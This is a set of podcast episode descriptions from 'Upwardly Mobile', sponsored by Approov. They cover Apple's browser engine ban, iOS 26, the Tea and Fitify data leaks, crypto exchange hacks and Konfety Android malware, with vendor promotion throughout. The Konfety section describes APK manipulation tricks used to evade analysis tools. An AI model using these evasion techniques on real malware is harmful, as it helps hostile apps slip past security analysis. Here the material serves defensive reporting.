Competition and Markets Authority (CMA): Provisionally designated Apple (and Google) with "Strategic Market Status," highlighting Apple's browser engine ban and suppression of web app competition. The UK sees strong enforcement as crucial for economic growth and innovation, especially for startups.• Why Apple Resists: It's fundamentally about protecting revenue.    ◦ Google Search Deal: Safari is Apple's "highest margin product," bringing in $20 billion annually from Google for default search engine status. Losing even 1% browser market share means a $200 million annual revenue loss.    ◦ App Store Revenue: By limiting web app capabilities, Apple protects its App Store revenue, estimated at $27.4 billion in 2024. Web apps could replace most phone apps, and even a 20% shift could mean a $5.5 billion annual loss for Apple.    ◦ User Lock-in: The ban also contributes to user lock-in, making it harder for consumers to switch devices or operating systems, as seen with iMessage.• The Path Forward: Regulators and advocates, like Open Web Advocacy, call for firm intervention to compel Apple to make necessary changes. Key fixes include allowing browsers to update existing apps with their own engines, enabling global web developer testing, granting full hardware and content filtering API access, and allowing third-party browsers to manage and install web apps.Conclusion: The fight for browser competition on iOS is a global issue, not just a regional one. With the EU, Japan, and the UK now directly addressing Apple's ban, 2026 is poised to be a decisive year in restoring browser competition and ensuring the web remains an open, interoperable platform.Sponsor: This episode is brought to you by Approov, ensuring secure mobile API access for your apps. Learn more at approov.io.Sources/Further Reading:• "Apple's Browser Engine Ban Persists, Even Under the DMA" - Open Web Advocacy• "Japan: Apple Must Lift Browser Engine Ban by December" - Open Web Advocacy• "UK Regulator Flags Apple’s iOS Browser Engine Ban in Draft SMS Designation" - Open Web AdvocacyKeywords: Apple, iOS, Browser Engine Ban, DMA, Digital Markets Act, WebKit, Safari, Open Web Advocacy, Browser Competition, Web Apps, App Store, Google, Mozilla, UK CMA, Japan Smartphone Act, Antitrust, Market Power, Revenue, Gatekeeper, Tech Regulation, Monopoly, Interoperability, Mobile Software Competition Act, SMS.🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Beyond the Beta: iOS 26 Features, AI, and Next-Gen App SecurityThis episode of Upwardly Mobile dives deep into Apple's groundbreaking iOS 26 update, exploring its transformative new features, the much-anticipated AI integrations, and crucial security considerations for developers. From the visually stunning Liquid Glass design to advanced app attestation requirements, we cover everything you need to know about Apple's latest mobile operating system. iOS 26 Key Features & User Experience iOS 26 marks a significant generational leap for Apple's mobile operating system, moving directly from iOS 18 to align naming with other Apple platforms, and is considered the biggest OS update since iOS 7. It introduces a bold new design and more AI-powered features.Design & Visuals: Experience Liquid Glass, Apple's new cohesive design language, which visually transforms widgets and the dock for a sleek, immersive interface. You’ll also notice improved animations in the Camera and Photos apps, ensuring smoother transitions. For drivers, customizable CarPlay wallpapers automatically adapt to light and dark modes, providing a visually pleasing transition between day and night.AI-Powered Innovations: Benefit from AI-powered notification summaries that streamline your alerts. Two highly anticipated phone features include Call Screening, which picks up unknown numbers, asks the caller's purpose, and shows a live transcript, allowing you to decide whether to answer. Its companion, Hold Assist, listens to hold music for you and alerts you the instant a real person is available.Enhanced App Experiences: The Weather app now offers "significant locations" for hyper-localized forecasts based on your frequently visited destinations. The Podcasts app provides custom playback options to fine-tune your listening. Safari now includes haptic feedback for downloads, offering tactile confirmation of completed actions.User Security & Privacy: A redesigned passcode screen simplifies access, and updated password settings offer greater control over website permissions. The "Reduce Loud Sounds" feature automatically lowers excessive audio levels to protect your hearing. Additionally, App Store age ratings have been revamped with new categories (13+, 16+, and 18+) and enhanced parental controls, ensuring a safer digital environment for younger users.Getting Your Hands on iOS 26 Anyone with a compatible iPhone can test iOS 26 features ahead of its official release. Apple opened its developer program to everyone for free in 2023, allowing users to load the developer beta right now.Compatibility: iOS 26 supports iPhone 11 and newer models, including the forthcoming iPhone 17 series. This includes any A13 Bionic handset forward, while the iPhone XR/XS generations are not included.Apple Intelligence Compatibility: For the headline Apple Intelligence features, you'll specifically need an iPhone 16 model or the iPhone 15 Pro/Pro Max.Installation Steps: To install, visit the Apple Developer site on the device you plan to update, sign in with your Apple ID, agree to the terms, and enable Developer Mode in Settings > Privacy and Security. Then, navigate to Settings > General > Software Update > Beta Updates and choose the "iOS 26 Developer Beta" option. The download size is approximately 15.28GB.Important Warning: The iOS 26 developer beta is primarily meant for developers, not for day-to-day use. Early builds often contain bugs that can cause apps to crash, drain your battery, overheat your phone, and generally make your device sluggish. It’s generally smarter to stick with the public beta (expected very soon) for your main iPhone unless you need to test software. Always archive a backup of your device before installing any beta software to prevent data loss.iOS 26 Security: A Developer's Imperative For apps handling sensitive or high-value data, such as those in fintech, healthcare, or enterprise sectors, iOS 26 strongly signals the need to implement multi-layer security measures beyond Apple's default protections.Rising API-Level Threats: Most security incidents today are focused on the backend and API, where attackers exploit app behavior to reverse-engineer API calls and then use bots, scripts, or tampered apps to access sensitive data. Crucially, Apple’s native device security does not inherently protect APIs.Beyond Apple’s App Attest: While Apple’s built-in App Attest API is a helpful tool, it does not work reliably on jailbroken devices, rendering it insufficient on its own for robust security, especially for high-value apps.The Power of Third-Party App Attestation (Sponsor Highlight): To ensure that API calls originate only from unaltered, legitimate app instances, strong app attestation mechanisms are essential. Third-party attestation solutions, such as Approov, are critical for comprehensive protection. These solutions offer:Detection of rooted/jailbroken devices, preventing tokens from being issued to apps on compromised devices.Resistance against runtime manipulation tools like Frida or Magisk.Dynamic API key delivery and certificate pinning, which avoids embedding static keys in code or resources and enforces strict server identity verification (Mutual TLS).Continuous verification of the app environment's integrity during use.Runtime Application Self-Protection (RASP): With the increasing sophistication of attack tools, iOS apps should actively protect themselves at runtime. RASP capabilities detect and respond to various threats, including runtime manipulation, debugging and hooking attempts, and unauthorized code injection. When debuggers are detected, sessions can be terminated. Sensitive logic and API call structures should also be obfuscated.Preparing for Sideloading (EU DMA): With legislation like the Digital Markets Act (DMA) forcing Apple to allow more third-party services and sideloading in the EU, app security can no longer rely solely on the App Store's "walled garden". Developers must prepare for multi-channel app distribution by validating app signatures post-distribution and embedding anti-repackaging measures that invalidate modified builds.Continuous Monitoring & DevSecOps: It is vital to integrate continuous threat monitoring, supporting dynamic policy updates and telemetry-based threat intelligence ideally with cloud-based control planes. Security should be integrated directly into CI/CD pipelines, scanning every build for secrets and insecure code. Automated tools like the Approov CLI should be utilized for secure app registration and deployment.Compliance & Privacy: Ensure GDPR/CCPA compliance by not collecting Personally Identifiable Information (PII) via security SDKs, maintaining access logs for tokens and policy changes, and configuring policy-driven access control based on region, device, or user group rules.Conclusion: iOS 26 sets a new standard for operating systems, offering a blend of innovative features, enhanced security, and expanded content options. For developers building high-value apps, this update serves as a strong cue to double down on multi-layer security strategies that go beyond Apple’s default offerings. Sponsor: This episode is brought to you by Approov. Learn more about securing your mobile APIs and protecting your apps from advanced threats at approov.io. Keywords: iOS 26, Apple, iPhone, AI features, Liquid Glass, Call Screening, Hold Assist, App Security, API Security, App Attestation, RASP, Runtime Application Self-Protection, Sideloading, Digital Markets Act (DMA), Jailbroken devices, Approov, Mobile Security, Cybersecurity, Fintech apps, Healthcare apps, Enterprise apps, iOS 26 Beta, Developer Tools, Mobile App Development, Threat Detection, Apple Intelligence, OS Update, Tech News. 🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Mobile-First Security: The Urgent Lessons from the Tea App BreachIn this focused segment of Upwardly Mobile, we unpack the recent Tea app breach, a sobering case study that highlights the critical need for a robust mobile-first cybersecurity strategy and proper API security. The Tea app, a women's dating safety application that rapidly climbed to the top of the free iOS App Store listings and reached the No. 1 spot on Apple's US App Store, claiming over 1.6 million users, was designed to allow women to exchange information about men to enhance safety. A key feature involved new users verifying their identity by uploading a selfie. The company confirmed a major security breach, stating they had "identified authorized access to one of our systems". Preliminary findings revealed access to approximately 72,000 user images. This alarming exposure included:13,000 images of selfies and photo identification documents, such as driver's licenses, which users had submitted during the account verification process.59,000 publicly viewable images from posts, comments, and direct messages within the app.The exposed images reportedly originated from a "legacy data system" that held information from more than two years prior. Posts on Reddit and 404 Media indicated that these sensitive user images, including faces and IDs, were posted on the anonymous online messageboard 4chan, with one post explicitly stating, "DRIVERS LICENSES AND FACE PICS! GET THE FUCK IN HERE BEFORE THEY SHUT IT DOWN!" and highlighting "No authentication, no nothing. It's a public bucket". Users from 4chan claimed to have discovered an exposed database hosted on Google’s mobile app development platform, Firebase, as the source of the vulnerability. According to Ted Miracco, Chief Executive Officer of Approov Limited, the Tea app breach is a stark example of a "systemic failure in API security". He attributes this failure to several critical oversights:Broken access controls. (BOLA)Weak authentication.Missing transport protections.Absent runtime safeguards.Miracco emphasizes that such failures are "not inevitable" but are "preventable with disciplined engineering, proper API defenses, and a real commitment to protecting user trust". This incident highlights a common pitfall where companies "rush apps to market, driven by subscriber growth and churn metrics, while privacy and security are sidelined". The broader lesson from the Tea app breach underscores how mobile apps introduce significant risk to an organization's back-end services. Mobile apps serve as a "front door to the back end," and a mobile device effectively holds "the secret key to the front door" – the key to server-side APIs. The increasing reliance on numerous server-side APIs accessed via mobile devices creates growing security exposure, especially since many APIs are often not adequately protected. Shockingly, up to half of APIs may lack basic usernames and passwords, and their access keys can be easily stolen from various locations, including mobile device files, server-side files, or even decompiled application source code. Hackers, by gaining control over their own devices, can easily reverse engineer apps and steal crucial API keys, which then allow them to build scripts to attack back-end corporate services undetected. Failing to protect API keys is likened to "putting all your money in a safe place in the home but not locking the front door". This breach serves as a powerful reminder that organizations must prioritize mobile security as a central component of their cybersecurity strategy, rather than an afterthought.🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Unlocking True Mobile & API Security in the Cloud AgeWelcome to "Upwardly Mobile", the podcast dedicated to navigating the complex world of mobile and cloud security! In this episode, we dive deep into why mobile app security and API security are not just technical concerns, but fundamental business imperatives for organisations of all types, from agricultural giants like John Deere to popular dating apps such as Hinge. We explore how the traditional reliance on static defences like code obfuscation is no longer sufficient against today's sophisticated, AI-powered threats, and what a truly resilient, Zero Trust-based security strategy looks like.Why Mobile & API Security Matters to Everyone in Your Organisation: The consequences of neglecting mobile app and API security are severe, ranging from massive data breaches to reputational damage and direct impacts on business operations. Here’s why key stakeholders deeply care:• Operational Leadership & Executives (e.g., C-suite): For companies like John Deere, insecure APIs and mobile apps can lead to attackers accessing, altering, or deleting "sensitive business information related to a farm's operations", resulting in "competitive disadvantage or even sabotage". For dating apps like Hinge, the core business relies on user trust, and API flaws, often exploited via the mobile app, can expose "vast amount of Personally Identifiable Information (PII) for other users", leading to "catastrophic for user acquisition, retention, and the company's survival". The ultimate "consequences of vulnerabilities—such as data breaches affecting billions and leading to hundreds of billions in losses"—fall under their purview.• Security Teams (e.g., CISO, Security Architects): Their mandate is to implement a "holistic" security approach that "protect[s] the app, its communications, and the API". They understand that "APIs are the true target" for attackers and that "a vulnerable mobile app communicating with a misconfigured cloud backend is a recipe for disaster". They are tasked with implementing "robust AppSec Strategy" and "strong Cloud Security Posture Management (CSPM)" to prevent "service disruption" and "full system compromise".• Legal & Compliance Teams: Mobile app and API vulnerabilities, as seen in e-hailing apps, can expose "vast amount of Personally Identifiable Information (PII)". This necessitates their involvement due to potential "severe privacy violations, massive user exodus, and significant legal and regulatory repercussions" associated with data breaches and non-compliance with data protection regulations.• Engineering & Development Teams: These teams are "directly responsible for 'building secure code for both the mobile app and the backend'". They must implement "secure development practices" and are critically concerned with "improper handling of secrets" like API keys, which are often hardcoded and easily extracted.• Marketing & Brand Management Teams: A breach of sensitive user data dueating to API or mobile app vulnerabilities would "severely damage the brand's reputation and trust", directly impacting efforts to attract and retain users.The Flaws in Traditional Mobile Security:• Obfuscation is Not Enough: While code obfuscation aims to deter reverse engineering and IP theft, it is a "thin veil, not an impenetrable shield". It offers "minimal protection against threats that manifest during runtime" and is "ineffective secret protection" as secrets must eventually be in cleartext memory. It can also create a "false sense of security" and is increasingly vulnerable to "modern tools and AI" which can automate deobfuscation.• APIs are the True Target: Attackers are increasingly bypassing the mobile app itself and "targeting the backend APIs directly". APIs provide a "direct pathway to backend application logic and sensitive data stores", making them prime targets for "credential stuffing, account takeover (ATO), scraping, and business logic abuse". Recent incidents involving e-hailing and delivery apps, Experian, and John Deere highlight common flaws like https://approov.io/blog/what-you-need-to-know-about-broken-object-level-authorization-bola and insecure access controls that exposed vast amounts of PII and operational data.The Solution: Embracing Dynamic, Zero Trust Runtime Protection:To address modern threats, a decisive shift from static, pre-deployment security to a "dynamic, runtime-centric model rooted in Zero Trust principles" is essential. This approach entails:• Zero Trust Architecture: This model mandates "never trust, always verify", requiring continuous, runtime verification of devices, users, and networks for access to critical resources. It emphasizes that "trust is never implicit" and acknowledges that traditional static checks and one-time authentication are insufficient. Zero Trust requires "external, cryptographically verifiable measurements that originate outside the app and cannot be forged or intercepted" to avoid a "circular trust problem".• Key Dynamic Defenses:    ◦ https://approov.io/mobile-app-security/rasp/: Acts as the app's "internal bodyguard", detecting and preventing real-time attacks from within the application. It identifies threats like reverse engineering attempts, code tampering, execution on compromised environments (root/jailbreak), and the presence of hooking frameworks. RASP provides "real-time protection" and "zero-day potential" by detecting anomalous behaviour.    ◦ https://approov.io/mobile-app-security/rasp/app-attestation/: This crucial process verifies the "authenticity and integrity of the mobile application instance and its runtime environment" before granting API access. It ensures that only "genuine, untampered app instances" running in a safe environment can interact with APIs, effectively solving the "‘What’ vs. ‘Who’ Problem" (validating the client app in addition to the user). This blocks automated bots, scripts, and tampered apps.    ◦ https://approov.io/mobile-app-security/rasp/runtime-secrets/: This robust solution eliminates the need to hardcode sensitive credentials like API keys directly into the app. Instead, secrets are stored securely in a backend service and delivered "just-in-time" to the validated app instance only after passing rigorous app attestation checks. This protects against both static and dynamic extraction of secrets.    ◦ Dynamic Channel Protection (Dynamic Pinning): Overcomes the brittleness of traditional static certificate pinning. This approach securely retrieves the current, valid set of pins dynamically over the air from a trusted management service (after attestation). This ensures "robust MitM Protection" against Man-in-the-Middle attacks while offering "flexibility and maintainability" for certificate rotations without requiring app updates.• Defense in Depth: An "optimal mobile security strategy employs a defense-in-depth approach, leveraging both static and dynamic techniques". While static analysis and obfuscation can still identify coding errors early, they must be "complemented by robust dynamic and runtime defenses". For applications handling sensitive data or critical functions, dynamic security measures are "fundamental requirements for achieving adequate resilience against modern threats".Empowering Your Mobile-to-Cloud Connection with Approov: Solutions like Approov Mobile Security play a vital role in securing the communication channel between your genuine mobile app and the cloud backend. Approov provides a "unique, patented runtime shielding solution" that focuses on:• Mobile App Attestation: Verifying the integrity of the running mobile app to ensure it's genuine and untampered, preventing bots and modified apps from accessing APIs.• API Request Verification: Cryptographically binding API requests to an attested app instance, ensuring only legitimate requests are processed.• Runtime Secrets Protection: Eliminating hardcoded API keys by securely delivering short-lived tokens to attested apps on demand.• Dynamic Pinning: Providing secure, over-the-air updates for certificate pins, ensuring tamper-proof communication between the app and API. Approov enables "https://approov.io/knowledge/ota-updates-are-essential-for-securing-mobile-apps" for security policies, pin configurations, and attestation logic, allowing instant responses to new threats without requiring app releases. It offers analytics and reporting for monitoring, auditing, and compliance.By adopting a comprehensive AppSec strategy that includes strong cloud security practices and innovative solutions, organisations can significantly reduce their attack surface and protect their users and valuable data.Don't leave your back door open – and ensure only trusted visitors can reach your front door!--------------------------------------------------------------------------------Sponsored by: Approov Visithttps://approov.io to learn how Approov can safeguard your mobile apps and APIs with advanced runtime protection, app attestation, and secure secrets management.--------------------------------------------------------------------------------Keywords: Mobile App Security, API Security, Cloud Security, AppSec, Zero Trust, RASP, App Attestation, Runtime Secrets Protection, Dynamic Pinning, Code Obfuscation, Data Breach, PII, Cyber Security, Digital Transformation, Enter🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Crypto Under Siege: Billions Lost in H1 2025 and the Battle for Web3 Security**Episode Description:**The first half of 2025 has witnessed an unprecedented surge in cyberattacks against cryptocurrency exchanges, leading to billions of dollars in stolen digital assets [1-3].In this episode of "Upwardly Mobile," we delve into the alarming statistics from CertiK's latest report and dissect the most significant incidents, including the Coinbase data breach and the Bybit hack [1, 2, 4]. Discover the evolving tactics employed by sophisticated attackers—from insider threats and social engineering to supply chain attacks and wallet compromises—and explore the critical security measures and technologies platforms are implementing to safeguard user funds and rebuild trust in the volatile Web3 landscape [5-11].Key Takeaways:• Record-Breaking Losses in H1 2025: Approximately $2.47 billion in cryptocurrency was stolen through hacks, scams, and exploits in the first half of 2025, already surpassing the total amount lost in all of 2024 [1-3]. According to CertiK, when accounting for confirmed, unrecovered losses, the net figure stands at $2.29 billion, exceeding last year's adjusted total of $1.98 billion [3].• Major Incidents Driving Losses: Two significant events accounted for nearly $1.78 billion of the total losses in H1 2025 [3]:    ◦ Bybit Breach (February 2025): Hackers stole an estimated $1.4 billion from the Dubai-based exchange in an attack linked to Lazarus, a state-sponsored North Korean APT group [1]. This incident largely contributed to wallet compromise being the costliest attack vector [6].    ◦ Cetus Protocol Incident: This decentralized exchange (DEX) on Sui lost $225 million due to hackers using spoofed tokens and price manipulation [6].• Coinbase Under Attack:    ◦ May 2025 Data Breach (Insider Threat/Social Engineering): Hackers bribed and coerced a small group of overseas customer support agents to steal sensitive customer data, including names, dates of birth, partial Social Security numbers, masked bank account numbers, addresses, phone numbers, and emails [4]. While no login credentials or private keys were obtained, this data was used for social engineering attacks [4]. Coinbase refused a $20 million extortion attempt and instead established a $20 million reward fund for information leading to the attackers' arrest [12]. The estimated financial impact for Coinbase is between $180 million and $400 million, including voluntary customer reimbursements for funds lost to social engineering [12]. This incident highlighted the critical risk of insider threats and the need for enhanced real-time endpoint security and data loss prevention (DLP) [5, 7].    ◦ March 2025 GitHub Action Supply Chain Attack: Coinbase was an initial target of a supply chain attack on GitHub Action, exploiting a public continuous integration/continuous delivery flow [5]. Coinbase successfully detected and mitigated this issue [5].• Evolving Attack Vectors:    ◦ Social Engineering and Phishing: These tactics remain highly lucrative, with scammers evolving methods to trick victims into revealing sensitive information or transferring funds [6, 13]. Phishing was the most costly attack vector in Q2 2025, with over $395 million lost, surpassing previous periods [14].    ◦ Wallet Compromise: This has been the costliest attack vector overall in H1 2025 due to major incidents like the Bybit hack [6].    ◦ Infrastructure-Level Breaches: More than 80% of stolen funds in 2025 have resulted from breaches where hackers gain significant access to core infrastructure [7].    ◦ Targeting Employees/Contractors: The Coinbase incident specifically illustrates a growing trend of cybercriminals bribing or coercing individuals with legitimate system access [7].    ◦ Supply Chain Attacks: Exploiting vulnerabilities in third-party tools or service providers, often through weak APIs or compromised software updates [10].    ◦ Malware Attacks: Including Advanced Persistent Threats (APTs) and keylogging for credential theft [15].• Strengthening Defenses: Crypto exchanges are implementing comprehensive security frameworks and multi-layered approaches to build resilience [11]:    ◦ Advanced Wallet Technologies: Utilizing Multi-Party Computation (MPC) Wallets to eliminate single points of failure by never reconstructing private keys in full [9, 16], alongside robust hot-warm-cold storage architectures [16].    ◦ Enhanced Security Protocols: Implementing Multi-Factor Authentication (MFA), biometric verification, and real-time transaction notifications [8].    ◦ Strong Governance Policies: Multi-approval policies for high-risk actions [8].    ◦ Insider Threat Detection: Robust detection and prevention systems are crucial [7].    ◦ Continuous Monitoring: Real-time monitoring of API activity and system updates [10].    ◦ Compliance: Adherence to international security standards like SOC 2 and ISO 27001 provides built-in compliance assurance [17].Relevant Links to Source Materials:• Excerpts from "Crypto Losses Surpass $2.47 Billion in H1 2025, CertiK Report Reveals Alarming Rise in Phishing Attacks" • Excerpts from "How Crypto Exchanges Get Hacked: Understanding the Growing Threat Landscape" **Sponsor Message:**This episode of Upwardly Mobile is brought to you by Approov. In a world where mobile apps are crucial for engaging customers and employees, Approov provides advanced mobile app protection against reverse engineering, tampering, and automation. Secure your APIs and protect your critical data with Approov. (Note: The information regarding Approov.io is not from the provided sources and should be independently verified.) Learn more at approov.io.**Keywords:**Cryptocurrency, Crypto exchange hacks, Cyberattacks 2025, Web3 security, Coinbase hack, Bybit breach, CertiK report, Social engineering, Insider threat, Supply chain attack, Crypto losses H1 2025, Digital asset security, Blockchain security, Phishing attacks, Wallet compromise, MPC wallets, Data breach, Cybersecurity for crypto, Decentralized finance, DeFi.🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

In this episode of Upwardly Mobile, we delve deep into the sophisticated world of Konfety malware and explore how remote app attestation provides a crucial defence against its cunning tactics.Konfety employs an "evil twin" method, creating malicious versions of legitimate apps that share the same package name and publisher IDs as benign "decoy twin" apps found on official app stores. This allows the malware to spoof legitimate traffic for ad fraud and other malicious activities.Konfety's "evil twins" are distributed through third-party sources, malvertising, and malicious downloads, effectively bypassing official app store security checks. To evade detection, Konfety employs sophisticated obfuscation and evasion techniques. These include dynamic code loading, where malicious code is decrypted and executed at runtime from an encrypted asset bundled within the APK. It also manipulates APK structures through tactics like enabling the General Purpose Flag bit 00 (which can cause some tools to incorrectly identify the ZIP as encrypted and request a password) and declaring unsupported compression methods (such as BZIP) in the AndroidManifest.xml (which can result in partial decompression or cause analysis tools like APKTool or JADX to crash). Other stealth techniques involve suppressing app icons, mimicking legitimate app metadata, and applying geofencing to adjust its behaviour by region. The malware leverages the CaramelAds SDK to fetch ads, deliver payloads, and maintain communication with attacker-controlled servers. Users may experience redirects to malicious websites, unwanted app installs, and persistent spam-like browser notifications. The threat actors behind Konfety are highly adaptable, consistently altering their targeted ad networks and updating their methods to evade detection.So, how does remote app attestation combat such a resilient threat? Remote app attestation is a security mechanism where a mobile app proves its identity and integrity to a trusted remote server. This process typically involves the mobile app generating a unique "fingerprint" or "evidence" of its current state, often using hardware-backed security features like Trusted Execution Environments or Secure Enclaves. This evidence includes measurements of the app's code, data, and the device's security posture (e.g., whether the bootloader is locked, if the device is rooted, or if it's running an official OS). This evidence is then sent to a trusted remote server, often an attestation service, for verification. The attestation service compares the received evidence against a known good baseline or policy, checking if the app is genuine and unmodified, if the code running is the expected untampered version, and if the device it's running on is secure and hasn't been compromised. Based on this verification, the server provides a "verdict," which determines whether the app is allowed to proceed with sensitive operations (like accessing premium content or making transactions).Remote app attestation provides specific protections against Konfety by:• Detecting "Evil Twins": Even if the "evil twin" spoofs a package name, its underlying code and environment measurements would likely differ from the legitimate app. The attestation service would detect this mismatch, as the "fingerprint" wouldn't match the expected genuine app.• Preventing Tampering: Konfety's manipulation of APK structures and dynamic code loading aims to hide malicious activity. Remote attestation, particularly if it includes code integrity checks and runtime environment monitoring, would detect these unauthorized modifications or the execution of unapproved code.• Identifying Compromised Devices: If Konfety relies on a rooted or otherwise compromised device to operate, remote app attestation can identify these device security issues, allowing the backend to deny service to that device.• Backend Control: A key benefit is that the decision of trust is made on a secure backend, not on the potentially compromised mobile device itself. This makes it much harder for Konfety to spoof or interfere with the attestation process.Organisations like Zimperium offer on-device Mobile Threat Defence (MTD) solutions and zDefend which are noted to protect customers against Konfety malware's new evasion techniques. HUMAN's Satori Threat Intelligence Team originally uncovered the Konfety operation in 2024, and their Human Defense Platform is stated to protect customers from its impacts.While remote app attestation isn't a silver bullet against all malware, it provides a strong defence against the specific techniques used by Konfety by verifying the authenticity and integrity of the app and its environment before allowing it to interact with critical backend services. Please note that the source materials were provided as excerpts, and direct hyperlinks to the full articles are not available.--------------------------------------------------------------------------------Keywords: Konfety malware, evil twin apps, mobile app security, remote app attestation, ad fraud, Android malware, obfuscation, dynamic code loading, APK manipulation, CaramelAds SDK, cyber security, mobile threats, Zimperium, HUMAN Security, app integrity, device compromise, malvertising, fraud detection, mobile security solutions, threat intelligence.🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

The Fitify Fiasco: Unpacking 138K Private Progress Photos, 206K Profile Photos & Hardcoded App SecretsWelcome to Upwardly Mobile! In today's episode, we dive deep into the recent massive data leak involving the popular iOS fitness app, Fitify, affecting over 25 million users globally. We'll explore the critical security vulnerabilities exposed and discuss how adherence to standards like OWASP MASVS and advanced solutions like Approov can protect your mobile apps and user data. The Fitify Fiasco: The Cybernews research team recently uncovered a significant data breach with Fitify, a widely used iOS fitness app. Their investigation revealed that 373,000 sensitive user files, including a staggering 138,000 progress photos, were stored in a publicly accessible Google Cloud bucket. Critically, these files lacked password protection or encryption at rest, meaning anyone could access them. Many of these exposed "progress pictures" and "body scans" were taken with minimal clothing to better showcase body changes, making the exposure highly sensitive for users tracking weight loss or muscle growth. Other leaked data included 206,000 user profile photos, 13,000 AI coach message attachments (which may include images or text), and 6,000 body scan files, including photos and AI-generated metadata (e.g., lean mass, body fat, posture). The leak was discovered on May 7th, 2025, and after Cybernews contacted the company, Fitify Workouts s.r.o. closed the unprotected instance on June 9th, 2025. Security Gaps Highlighted: Despite Fitify's Google App Store description clearly stating that "data is encrypted in transit", Cybernews found a severe lack of basic access controls, which poses serious privacy risks. The fact that user data could be accessed without any passwords or keys demonstrated that it was not encrypted at rest. Furthermore, researchers discovered hardcoded secrets embedded directly within the app's code. These included Google API and Client IDs, Firebase database URLs, Facebook tokens (such as Facebook App ID and Client Token), and even an Algolia API key, which was notably not disclosed in Fitify's privacy policy. These exposed credentials could potentially enable attackers to access backend infrastructure, impersonate users, or inject malicious content. This issue is not isolated; Cybernews's broader research found that 71% of 156,000 iOS apps analyzed leak at least one secret, with an average of 5.2 secrets per app. Understanding Mobile App Security with OWASP MASVS: This incident underscores the importance of adhering to robust mobile application security standards like the OWASP Mobile Application Security Verification Standard (MASVS). MASVS serves as an industry standard and a comprehensive framework for mobile software architects, developers, and security testers to ensure the development of secure mobile applications. It categorizes security controls into various groups:MASVS-STORAGE: Addresses the secure storage of sensitive data on a device (data-at-rest), a critical area directly violated by the Fitify leak.MASVS-NETWORK: Focuses on secure network communication between the mobile app and remote endpoints (data-in-transit). While Fitify claimed encryption in transit, the publicly accessible bucket points to fundamental network security misconfigurations in data storage.MASVS-CODE: Covers security best practices for data processing and keeping the app up-to-date, directly related to the problem of hardcoded secrets and securing credentials.MASVS-PRIVACY: Aims to protect user privacy, which was severely compromised in this breach due to the sensitive nature of the leaked progress photos.The OWASP Mobile Top 10 risks also highlight prevalent issues in mobile app security, such as static reverse engineering (ranked 9th) and code tampering (ranked 8th), which are common techniques used by attackers to uncover hardcoded secrets and manipulate app behavior. Shielding Your App: Solutions with Approov: The Fitify leak demonstrates the critical need for advanced mobile app and API protection beyond basic security measures. Approov offers a runtime shielding solution that effectively protects mobile apps, their APIs, and the communication channel between them from automated attacks. Approov works by using a cryptographically signed "Approov token" to allow the app to provide proof of its authenticity, ensuring that only a genuine, untampered mobile app running in an uncompromised environment can access your APIs. Key Approov capabilities relevant to preventing such leaks and attacks include:Runtime Secrets Protection: This feature allows hardcoded API keys and other sensitive secrets to be removed directly from the app's code and instead securely managed in the Approov cloud. These secrets are only delivered to verified, legitimate app instances at runtime. This directly addresses the hardcoded secrets vulnerability found in Fitify.MASVS-R Resilience against Reverse Engineering and Tampering: Approov significantly enhances an app's resilience. It integrates diverse detection mechanisms to identify and respond to threats such as rooted or jailbroken devices, attached debuggers, app tampering, the presence of widely used reverse engineering tools (e.g., Frida), and apps running in emulators or cloners.MASVS-L2 SSL Pinning: Approov provides dynamic certificate pinning as a defense-in-depth measure to secure TLS connections. This helps prevent Man-in-the-Middle (MitM) attacks by ensuring the app only communicates with trusted backend endpoints. A powerful aspect is that these pins can be updated over-the-air without requiring a new app release, simplifying DevOps processes.By blocking illegitimate requests, Approov prevents the exploitation of stolen user credentials, known or "zero-day" vulnerabilities, malicious business logic manipulation, and large-scale MitM attacks. Actionable Takeaways: This incident serves as a stark reminder for both developers and users. Developers must prioritize secure coding practices, implement robust access controls and encryption for all data storage (at rest and in transit), and avoid hardcoding sensitive information. For users, it highlights the critical importance of scrutinizing privacy policies, understanding what data is collected and how it's stored, and being cautious about sharing sensitive personal information through mobile applications. Relevant Links:Fitify Privacy Policy: https://gofitify.com/privacy-policyApple World Today report: "Cybernews claims iOS Fitify app has a massive data leak"Cybernews report: "Fitify app exposes 138K user progress photos"OWASP Mobile Security Project: For more on mobile app security standards and testing guidesSponsor: Approov Mobile Security: Learn how to protect your apps and APIs from sophisticated attacks at approov.ioKeywords: Fitify, Data Leak, Mobile App Security, iOS, Fitness App, Privacy, PII, Personal Data, Google Cloud, Hardcoded Secrets, API Security, OWASP, MASVS, Approov, Runtime Shielding, SSL Pinning, Authentication, Authorization, Reverse Engineering, Tampering, Jailbreak, Rooting, Man-in-the-Middle (MitM), Zero-Day Vulnerabilities, Cybernews, Data Breach Prevention, Digital Health, App Vulnerabilities, Mobile Privacy, Cyber Attack. 🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

